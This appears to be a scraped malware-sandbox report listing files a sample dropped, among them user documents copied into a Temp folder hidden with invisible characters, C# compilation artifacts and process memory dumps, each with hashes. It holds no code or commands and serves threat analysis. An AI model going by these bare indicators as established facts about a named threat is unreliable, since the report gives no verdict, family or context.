Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‏\Common Files\Desktop\ResizeBlock.docx

Filesize
12KB

MD5
1d504cd080343678e611180eb486ffd5

SHA1
d398d10c747a912637c95fd2f0c2a1fa13f0f79b

SHA256
670978791b3410673c57a9eba5833226b4c4c26bffeb135e1c77c9baa9f856aa

SHA512
825d5ba177e2e57dd0381f4de92a2a7d8d429abe3058753257f7707d1e06df8d053389b5a42c2a98e056361fbb4e4559e858cf023af38c8717efb11321201b1f

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‏\Common Files\Documents\AddLimit.docx

Filesize
14KB

MD5
c704a092ffd94df3e91f541268f5e28d

SHA1
562313e1fe41bc4a2774ef1c1188494867e45df4

SHA256
10c70fad89b98085a1a255761b4eb293f8bf133b5789d0b0e9f42abcae6321dd

SHA512
c64b7bf1f17109e2e1f738b6aef8222fccc7eaa19ca82aec19c40cf9ec56a22401d84457957c87e34cde2a42c65d254b3d006036b016f119464981de0f51b9be

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‏\Common Files\Documents\CloseImport.doc

Filesize
739KB

MD5
59acf8fb387f6ed9e0c2124f1cfcf905

SHA1
821df70e08a25ff3b8b2161e6fa991ef22ddfd62

SHA256
e16825ee6c25de541462fa30b92165ae80b02d9c6c53aadb29fe017dde498bb3

SHA512
5751a9ee4d8b37dcc3ecbf8d25c42d5b2066228cb860d3cbbeb91c6cf4f51fc5e45277120c2e79ce1025a6e1b8ec455f3fdd71baead49ffebf3a8599b8bb2c72

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‏\Common Files\Documents\NewLock.docx

Filesize
16KB

MD5
e053cb60658332b0e8c21dd1530118d3

SHA1
eb7d6620074c713c2e0686f28259bcddbc5d92ff

SHA256
f8913c6a5383073aad53c637656082ae7cb8c764a764069d2507c668b7d06428

SHA512
c52467bcf32058987fe9f4641cf7c69c9fb3d2cde6e4a7d11193b1027f6596cbfb09d4414d23e936b147c54623d9e1cc8db3673c6a3115f4897d3bea1f37dacc

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‏\Common Files\Documents\SendSubmit.pdf

Filesize
1.3MB

MD5
98b750399afaa35190920bea48628534

SHA1
d0b270bf9c5b02d0933698bc696453fe54860ac0

SHA256
5df2edc5389e5c89653eee09d26335e9a3d9984d706ec71b4387fda142bb4342

SHA512
86191adf7f68025b16661c30a4bff76d901f0efd42fdd131b85f97fdccde9781f0aad5e1d30efcb1e118e6a22b103d24bf9afaeb13acf900529ce48d34f30b83

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‏\Common Files\Documents\UnlockMount.docx

Filesize
13KB

MD5
0e5660d83199552a5132020a8c9d3228

SHA1
57dbb151664030f84a7f60826110805b775cad46

SHA256
6af838401ad548b50b9d4192a5fe23cbbc28eebe05740c316eeb9cc9b33e10df

SHA512
76fa3e82ece07e6dcd810293528105e4485bca9071989694b681b9181bf345999d3ec365e923ee6c0dfb94f972b747c9531dc3d4eb0737dcf53e9a7c5f1a5c79

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‏\Common Files\Documents\UseNew.doc

Filesize
625KB

MD5
a1f18d77842ca9c4d348070e41f15d50

SHA1
cd5c7a177461f8de798c4a1b2e0447ed37346935

SHA256
27d8366bc416596b837a8e342335bf54a6bc5bc19c01bd241b28b15bacbe7ac3

SHA512
1cec9befa3474e321f7cf19584296f49f3aa8bbaf026391f0365443deae7def02cb568e9e096c9ea72445e46d7cc5bba7a1beded7458878f93746d49b915f71a

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‏\Common Files\Downloads\ClearAdd.png

Filesize
219KB

MD5
c979a86b48ab35ce5ac999398a9684bc

SHA1
3ba0694dff8ab1f1c0faf7c1397096861c1a65b9

SHA256
d5ac8d1acfff2e859edb215ec57e915462c5620ab74791f892de496d2ab6e0c8

SHA512
594eb20306c83e3cbfca10eba9ad5ab464219e4897a58a4f71c863a86f83c4e284d4b2607fab734aa1adf6f9bd2f3e90d887fff0063fa5abcf58ffa4ddad1caf

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‏\Common Files\Downloads\NewCompare.pdf

Filesize
231KB

MD5
fe209ec1321a790d20a0bac2913d6dec

SHA1
39c6e5702faa111a8ebb64352ab861c3e81287ee

SHA256
ab071b825af474963343c95aabc10476f6a50e9646c9837665c94ca71d5769a4

SHA512
3e7e021e187359677f3134bf47b62ab57238012a0898f14a90dd029f8ac0a6dc3b6b50f075c2cdb8ccab74a5680167f6d0723080fa5e8b9402fad0e790688c65

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‏\Common Files\Downloads\ReadEnable.png

Filesize
545KB

MD5
e70b26d6742a48136125b7ba711e2468

SHA1
8926a826677c45957c7ff9925b97bbcaeb9ff867

SHA256
f588e1de94c1f59d9bb16db68e45c35e0aa5edacea6a9670b4941defecd8dfa3

SHA512
49a4583d7419d418e57b37e85fe682840391c8b4ae935031c92e3c1a725501f8d65bced2280f8d169dd410b55e73e4f5ca3e75a77cb3af299f23619a11c17fab

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\3nxvpzqk\3nxvpzqk.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\3nxvpzqk\3nxvpzqk.cmdline

Filesize
607B

MD5
1d3e0a6824d4b89c729f1c62425f5b97

SHA1
af469a51202bbae05ac80260072673ba028443c2

SHA256
86e12b8c6634e61b224e4c882969dc81eb35176cd86e5b2bf8a53aaab3529929

SHA512
629708539d109fb20d173439ea559345abd53f35404a34d94a2f25315d8d1af396cf6e916e584d65022f32b7d7cc7e9ce5a0631f05cb7e2ef318b83d7cb43459

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\3nxvpzqk\CSC7F1787D27BDA473C993B9DD674131AE4.TMP

Filesize
652B

MD5
2b9371be126488c3b7a1c7e3876c2b6a

SHA1
074f374185075f8d599ceccf0e6b33a34c406709

SHA256
9e0d741e7b75fac35baacc38e035e651026013eea0ff31adbcf26494a28e95ca

SHA512
9e2f7cb4785873c7cfe7b701d7b2baeab32ed2c205b25e7e4c01a535a7815afd76a7af88591ef4a120f1f10327edec6ab45adbb3d88c1e3226cf5ca8e34e0f86

Download Submit
memory/1368-56-0x00007FFC03E20000-0x00007FFC03E39000-memory.dmp

Filesize
100KB

Download
memory/1368-332-0x00007FFBFE910000-0x00007FFBFE929000-memory.dmp

Filesize
100KB

Download
memory/1368-80-0x00007FFBEDEC0000-0x00007FFBEDFDC000-memory.dmp

Filesize
1.1MB

Download
memory/1368-68-0x00007FFBFE350000-0x00007FFBFE37E000-memory.dmp

Filesize
184KB

Download
memory/1368-69-0x00007FFBFDAE0000-0x00007FFBFDB98000-memory.dmp

Filesize
736KB

Download
memory/1368-147-0x00007FFBFE910000-0x00007FFBFE929000-memory.dmp

Filesize
100KB

Download
memory/1368-310-0x00007FFBEEC00000-0x00007FFBEF1EA000-memory.dmp

Filesize
5.9MB

Download
memory/1368-81-0x00007FFBFE380000-0x00007FFBFE3A3000-memory.dmp

Filesize
140KB

Download
memory/1368-78-0x00007FFBFE7F0000-0x00007FFBFE7FD000-memory.dmp

Filesize
52KB

Download
memory/1368-76-0x00007FFBFDE50000-0x00007FFBFDE64000-memory.dmp

Filesize
80KB

Download
memory/1368-320-0x00007FFBFDAE0000-0x00007FFBFDB98000-memory.dmp

Filesize
736KB

Download
memory/1368-72-0x00000284FBB90000-0x00000284FBF05000-memory.dmp

Filesize
3.5MB

Download
memory/1368-74-0x00007FFBEE410000-0x00007FFBEE785000-memory.dmp

Filesize
3.5MB

Download
memory/1368-251-0x00007FFBFE350000-0x00007FFBFE37E000-memory.dmp

Filesize
184KB

Download
memory/1368-252-0x00007FFBFDAE0000-0x00007FFBFDB98000-memory.dmp

Filesize
736KB

Download
memory/1368-253-0x00000284FBB90000-0x00000284FBF05000-memory.dmp

Filesize
3.5MB

Download
memory/1368-73-0x00007FFBFE710000-0x00007FFBFE733000-memory.dmp

Filesize
140KB

Download
memory/1368-67-0x00007FFBEEC00000-0x00007FFBEF1EA000-memory.dmp

Filesize
5.9MB

Download
memory/1368-63-0x00007FFBFE910000-0x00007FFBFE929000-memory.dmp

Filesize
100KB

Download
memory/1368-64-0x00007FFBFE9E0000-0x00007FFBFE9ED000-memory.dmp

Filesize
52KB

Download
memory/1368-60-0x00007FFBEE8E0000-0x00007FFBEEA4F000-memory.dmp

Filesize
1.4MB

Download
memory/1368-58-0x00007FFBFE380000-0x00007FFBFE3A3000-memory.dmp

Filesize
140KB

Download
memory/1368-325-0x00007FFBFE9E0000-0x00007FFBFE9ED000-memory.dmp

Filesize
52KB

Download
memory/1368-54-0x00007FFBFE3B0000-0x00007FFBFE3DD000-memory.dmp

Filesize
180KB

Download
memory/1368-326-0x00007FFBFE710000-0x00007FFBFE733000-memory.dmp

Filesize
140KB

Download
memory/1368-329-0x00007FFC03E20000-0x00007FFC03E39000-memory.dmp

Filesize
100KB

Download
memory/1368-48-0x00007FFC03F00000-0x00007FFC03F0F000-memory.dmp

Filesize
60KB

Download
memory/1368-327-0x00007FFC03F00000-0x00007FFC03F0F000-memory.dmp

Filesize
60KB

Download
memory/1368-328-0x00007FFBFE3B0000-0x00007FFBFE3DD000-memory.dmp

Filesize
180KB

Download
memory/1368-84-0x00007FFBEE8E0000-0x00007FFBEEA4F000-memory.dmp

Filesize
1.4MB

Download
memory/1368-272-0x00007FFBEE410000-0x00007FFBEE785000-memory.dmp

Filesize
3.5MB

Download
memory/1368-300-0x00007FFBEE8E0000-0x00007FFBEEA4F000-memory.dmp

Filesize
1.4MB

Download
memory/1368-309-0x00007FFBEDEC0000-0x00007FFBEDFDC000-memory.dmp

Filesize
1.1MB

Download
memory/1368-294-0x00007FFBEEC00000-0x00007FFBEF1EA000-memory.dmp

Filesize
5.9MB

Download
memory/1368-295-0x00007FFBFE710000-0x00007FFBFE733000-memory.dmp

Filesize
140KB

Download
memory/1368-25-0x00007FFBEEC00000-0x00007FFBEF1EA000-memory.dmp

Filesize
5.9MB

Download
memory/1368-337-0x00007FFBEDEC0000-0x00007FFBEDFDC000-memory.dmp

Filesize
1.1MB

Download
memory/1368-338-0x00000284FBB90000-0x00000284FBF05000-memory.dmp

Filesize
3.5MB

Download
memory/1368-336-0x00007FFBFE7F0000-0x00007FFBFE7FD000-memory.dmp

Filesize
52KB

Download
memory/1368-335-0x00007FFBFDE50000-0x00007FFBFDE64000-memory.dmp

Filesize
80KB

Download
memory/1368-334-0x00007FFBFE350000-0x00007FFBFE37E000-memory.dmp

Filesize
184KB

Download
memory/1368-333-0x00007FFBEE410000-0x00007FFBEE785000-memory.dmp

Filesize
3.5MB

Download
memory/1368-331-0x00007FFBEE8E0000-0x00007FFBEEA4F000-memory.dmp

Filesize
1.4MB

Download
memory/1368-330-0x00007FFBFE380000-0x00007FFBFE3A3000-memory.dmp

Filesize
140KB

Download
memory/1368-30-0x00007FFBFE710000-0x00007FFBFE733000-memory.dmp

Filesize
140KB

Download
memory/2368-186-0x000001915F350000-0x000001915F358000-memory.dmp

Filesize
32KB

Download
memory/2880-83-0x00007FFBECE10000-0x00007FFBED8D1000-memory.dmp

Filesize
10.8MB

Download
memory/2880-85-0x00007FFBECE10000-0x00007FFBED8D1000-memory.dmp

Filesize
10.8MB

Download
memory/2880-168-0x00007FFBECE10000-0x00007FFBED8D1000-memory.dmp

Filesize
10.8MB

Download
memory/2880-82-0x00007FFBECE13000-0x00007FFBECE15000-memory.dmp

Filesize
8KB

Download
memory/2880-95-0x000001AF58600000-0x000001AF58622000-memory.dmp

Filesize
136KB

Download